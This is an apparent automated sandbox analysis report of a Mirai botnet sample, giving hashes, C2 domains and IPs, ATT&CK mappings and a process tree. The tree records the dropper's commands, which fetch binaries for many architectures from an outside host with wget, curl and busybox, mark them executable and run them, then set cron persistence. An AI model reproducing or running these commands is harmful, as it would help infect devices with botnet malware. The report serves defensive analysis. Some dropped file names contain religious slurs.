mirai | 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1

Analysis

max time kernel
149s
max time network
153s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
02-09-2024 01:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
Size

8KB
MD5

86311599eaaff9e71ddc72ada1b21c2e
SHA1

572f97e41071d072dfc97127454d4978b50a81e2
SHA256

85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1
SHA512

74fccf9b268bdcf4220dcd8213a83213b7be545bfaf7cf406f32bf7e7c924ef53d66d04cb3aeb4c8024c60803ce806ddfb501ad0d59780780fc9dd19f40df317
SSDEEP

96:RE+blpgA856Hslefac5h5k9vH658TuF4dZAkk59yKXMJeDMhsm/vj+9RlYz218Lu:RE+P7

Score

10^/10

mirai botnet discovery persistence

Malware Config

Extracted

Family

mirai

www.ckea.ru

www.akck.ru

45.152.112.46

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Contacts a large (42975) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Executes dropped EXE 1 IoCs

ioc	pid	Process
/bin/feankzzyx	1513	feankzzyx

Creates/modifies Cron job 1 TTPs 3 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/root	feankzzyx
File opened for modification	/var/spool/cron/crontabs/tmp.0WtyLY	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.vB7GZ1	crontab

Writes file to system bin folder 1 TTPs 54 IoCs

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/bin/lksyatly	feankzzyx
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/ALLAH_IS_EVIL.txt	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/firmware_v4?user=root&dir=%2Fbin	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/szafsgyhen	feankzzyx
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/allah_is_satan	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/current_user2	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	mcgcslj	1513	feankzzyx

Reads runtime system information 3 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/sys/kernel/ngroups_max	id
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	id

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/allah_is_prick.html	feankzzyx

/tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
/tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
1⤵
- Writes file to system bin folder
PID:1501
- /usr/bin/id
  id
  2⤵
  - Reads runtime system information
  PID:1503
- /bin/sed
  sed -n "s/^uid=[0-9]\\+(\\([^)]\\+\\)).*/\\1/p"
  2⤵
  - Reads runtime system information
  PID:1504
- /usr/bin/whoami
  whoami
  2⤵
  PID:1505
- /usr/bin/wget
  wget "http://45.152.112.46/firmware_v4?user=root&dir=/bin"
  2⤵
  - Writes file to system bin folder
  PID:1506
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.x86_64 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1510
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:1512
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  - Creates/modifies Cron job
  - Writes file to system bin folder
  - Changes its process name
  - Writes file to tmp directory
  PID:1513
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:1527
  - - /bin/hostname
      hostname -I
      4⤵
      PID:1534
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:1529
  - - /bin/hostname
      hostname -I
      4⤵
      PID:1537
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:1530
  - - /bin/hostname
      hostname -I
      4⤵
      PID:1535
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:1531
  - - /bin/hostname
      hostname -I
      4⤵
      PID:1538
- - /bin/sh
    sh -c "crontab /var/spool/cron/crontabs/root"
    3⤵
    PID:1558
  - - /usr/bin/crontab
      crontab /var/spool/cron/crontabs/root
      4⤵
      Creates/modifies Cron job
      PID:1562
- - /bin/sh
    sh -c "crontab /var/spool/cron/crontabs/root"
    3⤵
    PID:1559
  - - /usr/bin/crontab
      crontab /var/spool/cron/crontabs/root
      4⤵
      Creates/modifies Cron job
      PID:1561
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv4l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1515
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv5l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1528
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv6l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1532
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv7l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1533
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.i586 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1536
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.i686 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1542
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.m68k -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1547
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.mips -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1556
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.mipsel -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1560
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.powerpc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1563
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.sh4 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1564
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.sparc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1565
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1566
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.arc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1567
- /bin/rm
  rm ff0
  2⤵
  PID:1568
- /bin/rm
  rm ff1
  2⤵
  PID:1569
- /bin/rm
  rm ff2
  2⤵
  PID:1570
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.x86_64 -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1571
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv4l -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1572
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv5l -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1574
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv6l -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1575
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv7l -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1576
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.i586 -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1577
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.i686 -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1578
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.m68k -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1579
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.mips -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1580
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.mipsel -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1581
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.powerpc -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1582
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.sh4 -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1583
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.sparc -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1584
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1585
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.arc -o feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1586
- /bin/rm
  rm ff0
  2⤵
  PID:1587
- /bin/rm
  rm ff1
  2⤵
  PID:1588
- /bin/rm
  rm ff2
  2⤵
  PID:1589
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.x86_64 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1590
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv4l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1595
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv5l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1596
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv6l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1597
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv7l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1598
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.i586 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1599
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.i686 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1600
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.m68k -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1601
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.mips -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1602
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.mipsel -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1603
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.powerpc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1604
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.sh4 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1605
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.sparc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1606
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1607
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.arc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1608
- /bin/rm
  rm ff0
  2⤵
  PID:1609
- /bin/rm
  rm ff1
  2⤵
  PID:1610
- /bin/rm
  rm ff2
  2⤵
  PID:1611
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.x86_64 -o feankzzyx
  2⤵
  PID:1612
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.armv4l -o feankzzyx
  2⤵
  PID:1613
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.armv5l -o feankzzyx
  2⤵
  PID:1614
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.armv6l -o feankzzyx
  2⤵
  PID:1615
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.armv7l -o feankzzyx
  2⤵
  PID:1616
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.i586 -o feankzzyx
  2⤵
  PID:1617
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.i686 -o feankzzyx
  2⤵
  PID:1618
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.m68k -o feankzzyx
  2⤵
  PID:1619
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.mips -o feankzzyx
  2⤵
  PID:1620
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.mipsel -o feankzzyx
  2⤵
  PID:1621
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.powerpc -o feankzzyx
  2⤵
  PID:1622
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.sh4 -o feankzzyx
  2⤵
  PID:1623
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.sparc -o feankzzyx
  2⤵
  PID:1624
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1625
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.arc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:1626
- /bin/rm
  rm ff0
  2⤵
  PID:1627
- /bin/rm
  rm ff1
  2⤵
  PID:1628
- /bin/rm
  rm ff2
  2⤵
  PID:1629
- /bin/rm
  rm allah_is_satan
  2⤵
  PID:1630
- /bin/sleep
  sleep 13
  2⤵
  PID:1632
- /bin/busybox
  busybox ftpget 45.159.211.121 allah_is_satan /firmware/firmware.sh
  2⤵
  PID:1631
- /bin/sh
  sh ./allah_is_satan
  2⤵
  PID:1637

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Privilege Escalation

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

Network Service Discovery

T1046

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/bin/ALLAH_IS_EVIL.txt

Filesize
828B

MD5
654d89fdcfd44330b80fc359d544adb9

SHA1
53ff7c283c7bab6b7071510349b7785e54da5454

SHA256
43a54d24621ffaa1dea049234cc1296ec4f1a8285c4c90254202329d9762ca75

SHA512
d3e32c72576fea7cb0d30957818c8ee61fa951fd7ff59a6fb462b53fe44559cf9eb501e9dad03d05703b4d6b33854ee062a3ba6ef940c46d7fef92a5c278d857

Download Submit
/bin/allah_is_satan

Filesize
15B

MD5
640832e65d903e762b84b766ea39ed8e

SHA1
a35a203fbae4b913edbd5f00cfc92fe076e39532

SHA256
68bf38c7874a4b54ed0dcc53ee8c55194ad2437818a577364a5735a56a819c2b

SHA512
f22f27d22110c3ec9f95a84617dbe49d4d59295bce184c31ceac5b5cffed1494107b25d48d1ecedab7c0a2d8ef377e7008732950fee903269c1d1fbdb126449b

Download Submit
/bin/current_user2

Filesize
5B

MD5
74cc1c60799e0a786ac7094b532f01b1

SHA1
552c0ba71b1046a083583ebf943cc9aa09f39a32

SHA256
53175bcc0524f37b47062fafdda28e3f8eb91d519ca0a184ca71bbebe72f969a

SHA512
21e1bc024bd76c76b68e04614c6def5b03fd4b658e59bfde065b464b520f463711b795455e3a5c81a8a1946b2bca2f83d6c19300a4d3326ce17959a7cbc0846a

Download Submit
/bin/feankzzyx

Filesize
10B

MD5
7d91028619a806f35dac54dd9f656276

SHA1
ce782d0d9bc3b79aaeb84d1ac8ae4c104aec875e

SHA256
8227203f32d8b00aa0ed784d3f0e11c722f3471d6a99976ee12fa12039fa0484

SHA512
9a1e0280c742cfc2e725115bc9b902bd6ff8bdfd5e6c40b65c5de320a174b3db5c0252145101867b80f3d5b6b6d354fc93481f5c34474b30e6e176987e09a956

Download Submit
/bin/feankzzyx

Filesize
113KB

MD5
c62947c17462ca4aabde6ac69b29bb50

SHA1
638f71c65bc039f53918bcec37506ec3cfcc6461

SHA256
bf5af10c4ceba35363d91795b7231b92339224510923a0e01aa76b6649dfff04

SHA512
209b802cab1f3669e1c17b7e2aed4c332f79ada57352e9ba6504dfe5ff835ed40dd8fd4f27922eec6d1428b0e0eea2d459012593984b9973ed95034b9eab27a4

Download Submit
/bin/firmware_v4?user=root&dir=%2Fbin

Filesize
4B

MD5
2a76ee31e49f38759ed046466b52a513

SHA1
e31dcb09b650cd3ab532a902888c33da96f45c55

SHA256
7ca1e25edd006f00775c737c9f1062a685ce2f897ceb52ce6a2bad7292257c1f

SHA512
e9c4932f7cd5ec940b1de3a82fa19dfc17f19e1eb7c8ef2ed435e637d0a5170d0ef0a5fad37f9092290e9e6bc1b6cea37c45b98a099426264720d57cfa5e93a9

Download Submit
/etc/d

Filesize
10B

MD5
5fdf12f09ba9ae91656b7e636bf6f5f2

SHA1
7d9841ca84bd617ad9ad4a65c6b33a8bc585b833

SHA256
f4494c6db1e637d9b6244bdba0f3a4f9fbdf5bb4720a00b1266d47e40cc1303d

SHA512
1373d5d9f555e64cd8d432ec5002ae7fd3b419299561cab6df7abd7e7fd82a3302f91bbaf926472a3a45d0580836c79877f891e9e7f8e7138edc45cdf9758349

Download Submit
/etc/d

Filesize
20B

MD5
495d1bc87763f3ef211841602e843d5d

SHA1
3edf014421164b8651c90a04971d0c0e74c8c4b4

SHA256
a097945146455245f2f88c1270e7311a917bfa5d941887a6e12fcb0c25029f83

SHA512
d367db85acab2fc0e719812b2d83741044f5274c4d86b33303c003490136bfceda840b663c8ed636cbde2cf590cda9065eb2f2ac78b6ca0fc1a93b469109f6ae

Download Submit
/etc/d

Filesize
50B

MD5
707cc153fe159e0bf1e1682df82b8c7d

SHA1
a560200c9dab6e1006150fd8f9aa76d898b23010

SHA256
b891aeb53c157f42328699360395648b06c162ade76b0cf9f60f442eff3c6331

SHA512
26f8f03ee1c142322d5c306a868bc1fd7aa9987f01c1a074cdbb3f4b0698371ab27dccee81c47633fefcb583dbbed8ed9537593c6a9048cdb529f0a944d294ab

Download Submit
/etc/d

Filesize
60B

MD5
77d595e584c206096ae30ad9a9453077

SHA1
d8b0dd9459c2ee9e03cbddd3fa17cb129a679959

SHA256
a2a7ee84fdcdc852dcdc9466fd6d4015e98bdf731ad33fe5cfb062934219c138

SHA512
676f3f54a4183de1270cab3b830a6e35294c5a604d25b31e229be1148554a5064d3fcd23e26a0b82ed5d9f4dfab9b0ecd8bade7e72844417d68e190681f38043

Download Submit
/tmp/allah_is_prick.html

Filesize
360B

MD5
3a2d9ee3d20a76ed6af3f066be482b64

SHA1
8ee4338df17d6dbbd7cfec1aa0abbd6a7b8081f6

SHA256
9d542210472a30c5142df1f1ac2a25d72a453c5dfad27b09f805691a2e936082

SHA512
715e81e95217eb0d10c1fb3518a589782c2f67bc100e349582cccb5ab5706c4ec931879e3c03717a099d475f8dbec58082cee306c74cd264bd733b5b98aa0b25

Download Submit
/var/spool/cron/crontabs/root

Filesize
26B

MD5
0f2d3d18a2ecc15782516f837a856cdb

SHA1
2610ac18bec608499faed39e36d33a3f72e9f9c5

SHA256
96f8be42a80bc3e00acd286dea3864656653bf4ab01859fbe6276d6e739c03f8

SHA512
cb772da31a6143d2dc020e08ed0533acdbff86e083e007cabdcb9494851b15123731afa3e0623b78f80fb1cac4976a816ff04fd0f21472846e8f5510667fbf03

Download Submit
/var/spool/cron/crontabs/root

Filesize
50B

MD5
e6767abaa7a533cd74a7d49f103c0639

SHA1
b2e349b512d4c9b25e95517e3f1f112a8f4c2ccd

SHA256
0da2dd6eaf0a1293418eaded89b00e33c5235ec39f7682234e165c2bbb8901b0

SHA512
7f12514d4b6d65d7eabc7ca60b8810c7ae5ca23b35f32682ee19b0e4b4f6c382f017a116f9e192be8bc94f4f3dcf8c9467215c0b7ed8bc98e1cdc6372b9137fd

Download Submit
/var/spool/cron/crontabs/tmp.0WtyLY

Filesize
253B

MD5
32a2e11d30310d64a4c5c50096137470

SHA1
2896233644c9021fd5bffba9d46be61631af1a24

SHA256
2b8a4436672ddf8534861fa315aef20bb9013a30abb370f6ad5fdb8c620e8379

SHA512
3c2a721eb712d494e87f1f6101aa2cb99c9bff9101266fe653508a39fa32a687cd53a4aa19f004f95ba693cfe8b6c6ab8b00ef93675d26d6a2a27b681e3c5971

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads